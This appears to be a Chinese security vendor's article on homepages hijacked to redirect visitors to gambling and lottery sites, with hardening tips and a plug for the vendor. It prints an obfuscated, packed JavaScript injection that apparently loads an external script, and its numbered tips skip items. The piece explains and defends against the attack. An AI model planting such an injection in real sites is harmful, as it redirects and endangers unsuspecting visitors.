网站被跳转彩票网站问题分析
由于之前客户网站总是被跳转到彩票、赌博网站,客户只是懂一些简单的代码,只能通过篡改的首页代码里,找到恶意代码进行删除,但是治标不治本,没过几天网站又被跳转了,客户经常为这些问题烦恼,每天提心吊胆的。其实问题的根本原因在于网站存在漏洞,以及服务器安全没有做好。我们SINE处理了成千上百的网站,总结的经验来看,网站首页被篡改的几率最大,都是篡改首页的标题,描述,以及在首页顶部添加一些加密的字符,如下图所示:
type=\"text/java\">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!\'\'.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return\'\\\\w+\'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);return p;}(\'l[\"\\\\e\\\\c\\\\1\\\\m\\\\i\\\\8\\\\n\\\\0\"][\"\\\\7\\\\4\\\\9\\\\0\\\\8\"](\\\'\\\\h\\\\2\\\\1\\\\4\\\\9\\\\3\\\\0\\\\0\\\\j\\\\3\\\\8\\\\d\\\\6\\\\0\\\\8\\\\k\\\\0\\\\5\\\\f\\\\a\\\\r\\\\a\\\\2\\\\1\\\\4\\\\9\\\\3\\\\0\\\\6\\\\2\\\\4\\\\1\\\\d\\\\6\\\\s\\\\0\\\\0\\\\3\\\\2\\\\q\\\\5\\\\5\\\\7\\\\7\\\\7\\\\b\\\\1\\\\3\\\\e\\\\a\\\\2\\\\p\\\\b\\\\1\\\\c\\\\i\\\\5\\\\j\\\\o\\\\1\\\\b\\\\f\\\\2\\\\6\\\\g\\\\h\\\\5\\\\2\\\\1\\\\4\\\\9\\\\3\\\\0\\\\g\\\');\',29,29,\'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68\'.split(\'|\'),0,{}))
该站点可能受到黑客攻击,部分页面已被非法篡改! 查看详情
该站点可能由于受到黑客攻击,部分页面已被非法篡改,可能会威胁到您的财产和信息安全,建议您谨慎访问。
被黑网址快照1:********com/011E...
被黑网址快照3:********com/004G...
防止网站被跳转的解决方法如下:
2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。
4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。
5.也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司。
